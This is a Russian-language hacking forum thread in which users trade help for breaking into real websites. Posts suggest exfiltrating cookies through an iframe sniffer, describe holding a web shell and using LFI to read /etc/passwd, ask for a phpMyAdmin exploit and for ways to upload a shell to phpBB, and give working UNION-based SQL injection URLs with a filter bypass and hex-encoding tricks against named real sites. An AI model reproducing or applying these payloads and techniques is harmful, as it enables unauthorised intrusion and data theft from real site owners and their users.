Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    отсылать куки на сервер или подгружать айфрейм сниффер.
     
  2. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    При запросе с document.cookie выводит билеберду, что-то похожее на md5, вот так:
    [​IMG]
     
  3. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Столкнулся с проблемой.
    есть сайт кпримеру antichat.ru, на нем куча поддоменов.
    на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((
    также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd
    они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.
     
  4. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    А кто сказал, что они физически в одном месте располагаются?) НАчать с того, что на уровне DNS может на другие IP отсылаться и заканчивая всякими технологиями виртуализациями и ретрансляторами по принципу балансеров.
     
  5. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Это можно предположить с помощью reverse ip.

    Рутай.
     
  6. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Автор вопроса не предоставил данных reverse ip.

    Но всем и так понятно, кто выше отписался, и кого вы прокомментировали, что в конкретном случае у Sleep'a, основной сайт и его поддомены физически разнесены по разным серверам. Да, так бывает, к сожалению, лол. И сей прискорбный факт ввел его в ступор.

    Поддерживаю сарказм и легкую иронию всех выше отписавшихся по этому вопросу.
     
  7. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    ребят,знает кто,чем можно сдампить данные через скулю(error-based) в хэдере client-ip?
    sqlmap вроде как не справился...(
     
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    И что reverseIP ? ФИзически - значит в локации единой как пространство данной конкретной ФС - а это вполне вмещает в себя тот же ксен и тп. И реверс будет один IP отдавать - а человек будет тупить и не понимать - отчего же ему выдает два разных passwd с одного хоста на одном IP
     
  9. dynda2000

    dynda2000 New Member

    Joined:
    16 Mar 2012
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ребята! подскажите сплоит для phpmyadmin 3.3.8 плииз
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    народ, как залить шел в phpBB 2.0.23??
    есть возможность разрешать разширения, сделал разширения php разрешонним, но при заливки php файла пишет ошибку Ошибка закачки: Невозможно закачать вложение в ./images/db_337.php.

    чёза бред, как быть?
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    старый добрый метод кто отменял?

    грузи через восстановление базы
     
    _________________________
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    там, нет встановления базы
     
  13. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    не могу вывести
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    крути как блинд
    первую букву я тебе уже нашел ;) "C" - char(67)
     
    _________________________
    1 person likes this.
  15. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11

    фильтрация union. есть какие-то варианты обойти кроме вслепую?
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://www.printingmuseum.org/eventdetail.php?id=-74+union(select(1),2,3,version(),5,6,7,8,9,10,11)
    Вы даже не пытались обойти!
     
    1 person likes this.
  17. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://www.rusmg.ru/php/content.php?id=6721+and+0+union+select+1,version(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--+

    Классный совет, хеккер.
     
    3 people like this.
  18. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Что не так делаю?
     
  19. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    в неправильном синтаксисе:
    table_schema=(medray)
    Вместо скобок тут должны быть кавычки (ну или кавычкни внутри скобок, в любом случае стринговый параметр надо обрамлять ими), а т.к. mq=on, то надо переводить в хекс имя бд medray (в нех формате кавычки не нужны)
    table_schema=0x6d6564726179
    или для примера
    table_schema=(0x6d6564726179)
     
  20. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Благодарю, второй способ с скобками работает, а еще один вопрос назрел: каким сервисом пользоваться, чтобы перевести название слова в 0x.....
     
Thread Status:
Not open for further replies.